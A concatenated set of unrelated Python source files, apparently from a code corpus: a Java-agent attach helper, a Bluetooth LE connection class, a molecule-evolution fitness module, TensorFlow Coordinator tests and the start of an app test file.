logging.info('Attaching to target process %d with args %s', pid, _agentcfg)
java_attach(pid, _agentcfg,
java=args.javavm,
agentjar=args.agentjar)
def java_attach_startup(cmdline, h, args):
global _javaserver, _agentcfg
if _javaserver is not None:
logging.warning("Java server can only be initialized once")
return
logging.info('Injecting agent during Java launch, starting server')
s, key, host, port = start_server(h, host=args.javaagenthost, port=args.javaagentport, key=args.javaagentkey)
debug = ''
if args.verbose > 1:
debug = 'debug;'
_agentcfg = '%sserverport=%d;serveraddr=%s;serverkey=%s' % (debug, port, host, key)
agentjar = args.agentjar
if agentjar is None:
agentjar = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'hallucinate-java-all.jar'
return [cmdline[0], '-javaagent:' + agentjar + '=' + _agentcfg] + cmdline[1:]
def java_stop():
global _javaserver
if _javaserver is not None:
stop_server(_javaserver)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
s, key, host, port = start_server(RequestHandler(LoggingHandler('JAVA')))
agentcfg = 'debug;serverport=%d;serveraddr=%s;serverkey=%s' % (port, host, key)
pid = int(sys.argv[1])
java_attach(pid, agentcfg)
sys.stdin.read()
stop_server(s)
|
bleConnection.py
|
from bluepy import btle
import threading
import time
message = "FiresMessage"
class MyDelegate(btle.DefaultDelegate):
def __init__(self):
btle.DefaultDelegate.__init__(self)
# ... initialise here
def handleNotification(self, cHandle, data):
global message
message = data
# ... perhaps check cHandle
# ... process 'data'
# Initialisation -------
class BleConnection:
def __init__(self, mac_addres, on_message_receive):
self.p = btle.Peripheral(mac_addres,btle.ADDR_TYPE_PUBLIC)
self.on_message_receive = on_message_receive
# Setup to turn notifications on, e.g.
self.svc = self.p.getServiceByUUID(0xec00)
self.ch_Tx = self.svc.getCharacteristics(0xec0e)[0]
self.ch_Rx = self.svc.getCharacteristics(0xec0e)[0]
self.p.setDelegate(MyDelegate())
self.p.setMTU(512)
self.setup_data = b"\x01\00"
self.p.writeCharacteristic(self.ch_Rx.valHandle+1, self.setup_data)
self.notification_thread = threading.Thread(target=self.get_notification)
self.notification_thread.start()
def get_notification(self):
global message
while True:
try:
if self.p.waitForNotifications(1.0):
self.on_message_receive(message)
except Exception:
time.sleep(0.2)
def write(self, message):
btime = bytes(message, 'utf-8')
try:
return self.ch_Tx.write(btime, True)
except btle.BTLEException:
return "btle.BTLEException"
# Perhaps do something else here
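# Minimal usage sketch (illustrative assumption: "AA:BB:CC:DD:EE:FF" is a placeholder
# MAC address, a reachable peripheral exposing the 0xec00 service is required, and
# bluepy itself only runs on Linux):
if __name__ == "__main__":
    def print_message(data):
        print("Received:", data)

    connection = BleConnection("AA:BB:CC:DD:EE:FF", print_message)
    connection.write("hello")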
|
generation_props.py
|
'''
Functions that are used while a Generation is being Evaluated
'''
import os
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
raise Exception('Invalid SMILES encountered while attempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
'''Calculate synthetic accessibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
raise Exception('Invalid SMILES encountered while attempting to calculate SAS')
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
raise Exception('Invalid SMILES encountered while attempting to calculate Ring penalty')
def create_parr_process(chunks, property_name):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processes
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
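# Example usage (hypothetical; mirrors how 'fitness' below calls this function):
#   chunks = evo.get_chunks(smiles_unique, num_processors, len(smiles_unique) / num_processors)
#   logP_by_smiles = create_parr_process(chunks, 'logP')   # -> {smiles: logP, ...}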
def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Calculate fitness of a generation in the GA
All properties are standardized based on the mean & stddev of the ZINC dataset
Parameters:
molecules_here (list) : List of molecules as strings
properties_calc_ls : Types of properties to be shown to the discriminator
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicates the type of encoding shown to the discriminator
generation_index (int) : Index of the current generation
max_molecules_len (int) : Largest mol length
device (string) : Device of the discriminator
num_processors (int) : Number of cpu processors to parallelize over
writer (tensorboardX writer obj) : Tensorboard graphing tool
beta (int) : Discriminator fitness parameter
data_dir (str) : Directory for saving data
max_fitness_collector (list) : List for collecting max fitness values
impose_time_adapted_pen (bool) : Impose time-adaptive discriminator penalty?
Returns:
fitness (np.array) : A linear combination of properties and
discriminator predictions
discriminator_predictions (np.array) : The predictions made by the discriminator
'''
dataset_x = evo.obtain_discr_encoding(molecules_here, disc_enc_type, max_molecules_len, num_processors, generation_index)
if generation_index == 1:
discriminator_predictions = np.zeros((len(dataset_x),1))
else:
discriminator_predictions = D.do_predictions(discriminator, dataset_x, device)
if properties_calc_ls is None:
fitness = discriminator_predictions
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
logP_results, SAS_results, ringP_results, QED_results = {}, {}, {}, {}
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP')
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS')
# Parallelize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP')
if 'QED' in properties_calc_ls:
QED_results = {}
for smi in molecules_here:
QED_results[smi] = Chem.QED.qed(Chem.MolFromSmiles(smi))
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_results = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls)
# Add SAS and Ring Penalty
# Note: The fitness function must include the properties listed in 'properties_calc_ls'
fitness = (logP_norm) - (SAS_norm) - (RingP_norm)
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
max_fitness_collector.append(max(fitness)[0])
## Impose the beta cutoff! --------------------------
if impose_time_adapted_pen:
if generation_index > 100:
if len(set(max_fitness_collector[-5:])) == 1: # Check if there is stagnation for 5 generations!
beta = 1000
print('Beta cutoff imposed index: ', generation_index)
f = open('{}/beta_change_log.txt'.format(data_dir), 'a+')
f.write(str(generation_index) + '\n')
f.close()
## beta cutoff imposed! --------------------------
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
print('beta value: ', beta)
fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls):
''' Obtain calculated properties of molecules in molecules_here, and standardize
values based on properties of the ZINC dataset.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
QED_calculated = []
for smi in molecules_here:
if 'logP' in properties_calc_ls:
logP_calculated.append(logP_results[smi])
if 'SAS' in properties_calc_ls:
SAS_calculated.append(SAS_results[smi])
if 'RingP' in properties_calc_ls:
RingP_calculated.append(ringP_results[smi])
if 'QED' in properties_calc_ls:
QED_calculated.append(QED_results[smi])
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
QED_calculated = np.array(QED_calculated)
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardize RingP based on zinc RingP (mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_calculated
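# Worked example (illustrative): a molecule with raw logP = 3.9 standardizes to
# (3.9 - 2.4729421499641497) / 1.4157879815362406 ~ 1.01, i.e. about one ZINC
# standard deviation above the ZINC mean.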
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device,
generation_size, num_processors, writer, beta, image_dir,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
discriminator_predictions = [discriminator_predictions[idx] for idx in order]
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write discriminator predictions of ordered smiles in a text file
f = open('{}/{}/discrP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in discriminator_predictions])
f.close()
# Add the average & max discriminator score of a generation
writer.add_scalar('mean discriminator score', np.array(discriminator_predictions).mean(), generation_index)
writer.add_scalar('max discriminator score', max(discriminator_predictions), generation_index)
f = open('{}/avg_discr_score.txt'.format(data_dir), 'a+')
f.write(str(np.array(discriminator_predictions).mean()) + '\n')
f.close()
f = open('{}/max_discr_score.txt'.format(data_dir), 'a+')
f.write(str(max(discriminator_predictions)[0]) + '\n')
f.close()
#print statement for the best molecule in the generation
# print('Best best molecule in generation ', generation_index)
# print(' smile : ', smiles_ordered[0])
# print(' fitness: ', fitness_ordered[0])
# print(' logP : ', logP_calculated[0])
# print(' sas : ', SAS_calculated[0])
# print(' ringP : ', RingP_calculated[0])
# print(' discrm : ', discriminator_predictions[0])
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, discrm: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], discriminator_predictions[0])
f.write(best_gen_str + '\n')
f.close()
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, discr_scores):
''' Plot the 100 molecules with the best fitness in a generation
Called at the end of each generation. The image for each generation
is stored with name 'generation_index.png'
Images are stored in directory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100: return  # raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, discr_scores)
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random molecules from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of the lists (args) based on decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
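# Example (illustrative): fitness_here = [0.2, 0.9, 0.5] gives order = [1, 2, 0],
# so all returned lists are sorted from highest to lowest fitness.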
def apply_generation_cutoff(order, generation_size):
''' Return a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a Fermi function is used to smooth the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
# import matplotlib.pyplot as plt
# plt.plot(positions, probabilities)
# plt.show()
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
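# Note (derived from the formula above): around rank 0.2 * len(order) the position
# term is 0 and the replacement probability crosses 0.5; better-ranked (fitter)
# molecules fall below 0.5 and worse-ranked molecules rise above it.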
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIES molecules, ordered by fitness
smiles_ordered (list) : list of SMILES molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index = np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def obtain_discrm_data(disc_enc_type, molecules_reference, smiles_mutated, selfies_mutated, max_molecules_len, num_processors, generation_index):
'''Obtain data that will be used to train the discriminator (inputs & labels)
'''
if disc_enc_type == 'smiles':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
elif disc_enc_type == 'selfies':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(selfies_mutated)).tolist()
dataset_smiles = selfies_mutated + random_dataset_selection
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in selfies_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
elif disc_enc_type == 'properties_rdkit':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo.obtain_discr_encoding(dataset_smiles, disc_enc_type, max_molecules_len, num_processors, generation_index)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
# Shuffle training data
order_training = np.arange(len(dataset_smiles))
np.random.shuffle(order_training)
dataset_x = dataset_x[order_training]
dataset_y = dataset_y[order_training]
return dataset_x, dataset_y
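# In all three branches above the labels follow the same convention (a description
# of the code as written, not new behavior): generated molecules are labelled 1 only
# if they already occur in the reference set, while the randomly drawn reference
# molecules are always labelled 1.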
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
|
coordinator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopOnEvent(coord, wait_for_stop, set_when_stopped):
wait_for_stop.wait()
coord.request_stop()
set_when_stopped.set()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
def SleepABit(n_secs, coord=None):
if coord:
coord.register_thread(threading.current_thread())
time.sleep(n_secs)
def WaitForThreadsToRegister(coord, num_threads):
while True:
with coord._lock:
if len(coord._registered_threads) == num_threads:
break
time.sleep(0.001)
class CoordinatorTest(tf.test.TestCase):
def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
t = threading.Thread(target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev))
t.start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
wait_for_stop_ev.set()
has_stopped_ev.wait()
self.assertTrue(coord.wait_for_stop(0.05))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
for t in threads:
self.assertFalse(t.is_alive())
def testJoinAllRegistered(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02, coord)),
threading.Thread(target=SleepABit, args=(0.01, coord))]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 3)
coord.join()
for t in threads:
self.assertFalse(t.is_alive())
def testJoinSomeRegistered(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01, coord))]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 2)
# threads[1] is not registered, so we must pass it in.
coord.join(threads[1:2])
for t in threads:
self.assertFalse(t.is_alive())
def testJoinGraceExpires(self):
def TestWithGracePeriod(stop_grace_period):
coord = tf.train.Coordinator()
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
threads = [
threading.Thread(target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
wait_for_stop_ev.set()
has_stopped_ev.wait()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=stop_grace_period)
TestWithGracePeriod(1e-10)
TestWithGracePeriod(0.002)
TestWithGracePeriod(1.0)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.05, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.05, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinIgnoresOutOfRange(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01,
tf.errors.OutOfRangeError(None, None, "First"),
True))
]
for t in threads:
t.start()
coord.join(threads)
def testJoinIgnoresMyExceptionType(self):
coord = tf.train.Coordinator(clean_stop_exception_types=(ValueError,))
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, ValueError("Clean stop"), True))
]
for t in threads:
t.start()
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.05, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testClearStopClearsExceptionToo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
coord.clear_stop()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("Second"), True)),
]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "Second"):
coord.join(threads)
def testRequestStopRaisesIfJoined(self):
coord = tf.train.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError as e:
reported = True
coord.request_stop(e)
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError as e:
coord.request_stop(e)
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def testRequestStopRaisesIfJoined_ExcInfo(self):
# Same as testRequestStopRaisesIfJoined but using sys.exc_info().
coord = tf.train.Coordinator()
# Join the coordinator right away.
coord.join([])
reported = False
with self.assertRaisesRegexp(RuntimeError, "Too late"):
try:
raise RuntimeError("Too late")
except RuntimeError:
reported = True
coord.request_stop(sys.exc_info())
self.assertTrue(reported)
# If we clear_stop the exceptions are handled normally.
coord.clear_stop()
try:
raise RuntimeError("After clear")
except RuntimeError:
coord.request_stop(sys.exc_info())
with self.assertRaisesRegexp(RuntimeError, "After clear"):
coord.join([])
def _StopAt0(coord, n):
if n[0] == 0:
coord.request_stop()
else:
n[0] -= 1
class LooperTest(tf.test.TestCase):
def testTargetArgs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
args=(coord, n))
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetKwargs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
kwargs={"coord": coord, "n": n})
coord.join([thread])
self.assertEqual(0, n[0])
def testTargetMixedArgs(self):
n = [3]
coord = tf.train.Coordinator()
thread = tf.train.LooperThread.loop(coord, 0, target=_StopAt0,
args=(coord,), kwargs={"n": n})
coord.join([thread])
self.assertEqual(0, n[0])
if __name__ == "__main__":
tf.test.main()
|
app.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from unittest import main, TestCase
from tempfile import mkdtemp
from os.path import join, exists, dirname, isdir, abspath, sep
from urlparse import urlparse, urljoin
from os import environ, mkdir
from shutil import rmtree, copytree
from re import search, sub
import random
from datetime import date, timedelta, datetime
import sys
from chime.repo_functions import ChimeRepo
from slugify import slugify
